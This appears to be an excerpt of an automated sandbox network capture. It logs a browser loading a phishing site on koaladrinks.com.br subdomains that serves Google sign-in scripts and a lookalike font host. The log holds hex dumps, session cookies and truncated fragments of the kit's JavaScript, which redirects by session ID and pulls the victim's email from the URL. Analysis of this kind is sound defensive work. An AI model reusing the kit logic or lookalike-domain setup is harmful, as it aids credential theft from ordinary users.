                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:42 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:43 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:43 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:43 UTC38INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a
                                                      Data Ascii: Content-Type: application/javascript
                                                      2025-01-10 08:27:43 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                      Data Ascii: Transfer-Encoding: chunked
                                                      2025-01-10 08:27:43 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:27:43 UTC5INData Raw: 33 31 63 0d 0a
                                                      Data Ascii: 31c
                                                      2025-01-10 08:27:43 UTC796INData Raw: 0a 66 75 6e 63 74 69 6f 6e 20 67 65 74 52 65 64 69 72 65 63 74 28 73 69 64 29 20 7b 0a 09 76 61 72 20 75 72 6c 20 3d 20 22 2f 73 2f 22 20 2b 20 73 69 64 3b 0a 09 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 66 65 74 63 68 69 6e 67 3a 20 22 20 2b 20 75 72 6c 29 3b 0a 09 66 65 74 63 68 28 75 72 6c 2c 20 7b 0a 09 09 6d 65 74 68 6f 64 3a 20 22 47 45 54 22 2c 0a 09 09 68 65 61 64 65 72 73 3a 20 7b 0a 09 09 09 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 09 09 7d 2c 0a 09 09 63 72 65 64 65 6e 74 69 61 6c 73 3a 20 22 69 6e 63 6c 75 64 65 22 0a 09 7d 29 0a 09 09 2e 74 68 65 6e 28 28 72 65 73 70 6f 6e 73 65 29 20 3d 3e 20 7b 0a 0a 09 09 09 69 66 20 28 72 65 73 70 6f 6e 73 65 2e 73 74 61 74 75 73 20 3d 3d 20 32
                                                      Data Ascii: function getRedirect(sid) {var url = "/s/" + sid;console.log("fetching: " + url);fetch(url, {method: "GET",headers: {"Content-Type": "application/json"},credentials: "include"}).then((response) => {if (response.status == 2
                                                      2025-01-10 08:27:43 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:27:43 UTC3INData Raw: 30 0d 0a
                                                      Data Ascii: 0
                                                      2025-01-10 08:27:43 UTC2INData Raw: 0d 0a
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.949746139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:42 UTC942OUTGET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1
                                                      Host: gstatic-fonts.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: font
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:43 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:43 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:43 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                      Data Ascii: Access-Control-Allow-Origin: *
                                                      2025-01-10 08:27:43 UTC13INData Raw: 41 67 65 3a 20 32 33 32 38 32 32 0d 0a
                                                      Data Ascii: Age: 232822
                                                      2025-01-10 08:27:43 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:43 UTC41INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d 0a
                                                      Data Ascii: Cache-Control: public, max-age=31536000
                                                      2025-01-10 08:27:43 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:43 UTC26INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 66 6f 6e 74 2f 77 6f 66 66 32 0d 0a
                                                      Data Ascii: Content-Type: font/woff2
                                                      2025-01-10 08:27:43 UTC66INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 61 70 70 73 2d 74 68 65 6d 65 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
                                                      2025-01-10 08:27:43 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:43 UTC37INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 30 37 20 4a 61 6e 20 32 30 32 35 20 31 35 3a 34 37 3a 32 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Tue, 07 Jan 2025 15:47:20 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.949747139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:44 UTC1073OUTGET /s/a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202 HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      Content-Type: application/json
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:28:14 UTC30INHTTP/1.1 408 Request Timeout
                                                      2025-01-10 08:28:14 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:14 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:14 UTC32INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a
                                                      Data Ascii: Content-Type: application/json
                                                      2025-01-10 08:28:14 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                      Data Ascii: Transfer-Encoding: chunked
                                                      2025-01-10 08:28:14 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:28:14 UTC3INData Raw: 30 0d 0a
                                                      Data Ascii: 0
                                                      2025-01-10 08:28:14 UTC2INData Raw: 0d 0a
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.949748139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:44 UTC632OUTGET /s/a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202/c9748d5c3ac951761ec94a41d03d3d9654c2f89666a929be7fcddaf1832a3cbc.js HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:44 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:45 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:45 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:45 UTC38INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a
                                                      Data Ascii: Content-Type: application/javascript
                                                      2025-01-10 08:27:45 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                      Data Ascii: Transfer-Encoding: chunked
                                                      2025-01-10 08:27:45 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:27:45 UTC5INData Raw: 61 65 62 0d 0a
                                                      Data Ascii: aeb
                                                      2025-01-10 08:27:45 UTC2795INData Raw: 0a 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 45 6d 61 69 6c 49 6e 55 52 4c 28 29 20 7b 0a 20 20 20 20 2f 2f 20 47 65 74 20 74 68 65 20 63 75 72 72 65 6e 74 20 55 52 4c 27 73 20 73 65 61 72 63 68 20 70 61 72 61 6d 65 74 65 72 73 0a 20 20 20 20 63 6f 6e 73 74 20 75 72 6c 50 61 72 61 6d 73 20 3d 20 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 0a 20 20 20 20 63 6f 6e 73 74 20 61 6c 6c 50 61 72 61 6d 73 20 3d 20 41 72 72 61 79 2e 66 72 6f 6d 28 75 72 6c 50 61 72 61 6d 73 2e 76 61 6c 75 65 73 28 29 29 3b 0a 20 20 20 20 0a 20 20 20 20 2f 2f 20 52 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 20 66 6f 72 20 65 6d 61 69 6c 20 76 61 6c 69 64 61 74 69 6f 6e 0a 20 20 20 20 63
                                                      Data Ascii: function checkEmailInURL() { // Get the current URL's search parameters const urlParams = new URLSearchParams(window.location.search); const allParams = Array.from(urlParams.values()); // Regular expression for email validation c
                                                      2025-01-10 08:27:45 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:27:45 UTC3INData Raw: 30 0d 0a
                                                      Data Ascii: 0
                                                      2025-01-10 08:27:45 UTC2INData Raw: 0d 0a
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.949749139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:44 UTC567OUTGET /s/a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202.js HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:44 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:45 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:45 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:45 UTC38INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a
                                                      Data Ascii: Content-Type: application/javascript
                                                      2025-01-10 08:27:45 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                      Data Ascii: Transfer-Encoding: chunked
                                                      2025-01-10 08:27:45 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:27:45 UTC5INData Raw: 33 31 63 0d 0a
                                                      Data Ascii: 31c
                                                      2025-01-10 08:27:45 UTC796INData Raw: 0a 66 75 6e 63 74 69 6f 6e 20 67 65 74 52 65 64 69 72 65 63 74 28 73 69 64 29 20 7b 0a 09 76 61 72 20 75 72 6c 20 3d 20 22 2f 73 2f 22 20 2b 20 73 69 64 3b 0a 09 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 66 65 74 63 68 69 6e 67 3a 20 22 20 2b 20 75 72 6c 29 3b 0a 09 66 65 74 63 68 28 75 72 6c 2c 20 7b 0a 09 09 6d 65 74 68 6f 64 3a 20 22 47 45 54 22 2c 0a 09 09 68 65 61 64 65 72 73 3a 20 7b 0a 09 09 09 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 09 09 7d 2c 0a 09 09 63 72 65 64 65 6e 74 69 61 6c 73 3a 20 22 69 6e 63 6c 75 64 65 22 0a 09 7d 29 0a 09 09 2e 74 68 65 6e 28 28 72 65 73 70 6f 6e 73 65 29 20 3d 3e 20 7b 0a 0a 09 09 09 69 66 20 28 72 65 73 70 6f 6e 73 65 2e 73 74 61 74 75 73 20 3d 3d 20 32
                                                      Data Ascii: function getRedirect(sid) {var url = "/s/" + sid;console.log("fetching: " + url);fetch(url, {method: "GET",headers: {"Content-Type": "application/json"},credentials: "include"}).then((response) => {if (response.status == 2
                                                      2025-01-10 08:27:45 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:27:45 UTC3INData Raw: 30 0d 0a
                                                      Data Ascii: 0
                                                      2025-01-10 08:27:45 UTC2INData Raw: 0d 0a
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.949756139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:44 UTC1738OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=_b,_tp/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=byfTOb,lsjVmc,LEikZe HTTP/1.1
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:45 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:45 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:45 UTC12INData Raw: 41 67 65 3a 20 38 39 36 36 33 0d 0a
                                                      Data Ascii: Age: 89663
                                                      2025-01-10 08:27:45 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:45 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:45 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:45 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:45 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:45 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:45 UTC37INData Raw: 44 61 74 65 3a 20 54 68 75 2c 20 30 39 20 4a 61 6e 20 32 30 32 35 20 30 37 3a 33 33 3a 32 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Thu, 09 Jan 2025 07:33:22 GMT
                                                      2025-01-10 08:27:45 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 46 72 69 2c 20 30 39 20 4a 61 6e 20 32 30 32 36 20 30 37 3a 33 33 3a 32 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Fri, 09 Jan 2026 07:33:22 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.949752139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:44 UTC1966OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=LEikZe,_b,_tp,byfTOb,lsjVmc/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=n73qwf,SCuOPb,IZT63,vfuNJf,UUJqVe,ws9Tlc,siKnQd,cciGGe,m9oV,vjKJJ,y5vRwf,L9OGUe,PrPYRd,MpJwZc,cYShmd,hc6Ubd,Rkm0ef,KUM7Z,WpP9Yc,lwddkf,SpsfSb,aC1iue,EFQ78c,xQtZb,zbML3c,zr1jrb,vHEMJe,YHI3We, [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:45 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:45 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:45 UTC11INData Raw: 41 67 65 3a 20 32 32 39 33 0d 0a
                                                      Data Ascii: Age: 2293
                                                      2025-01-10 08:27:45 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:45 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:45 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
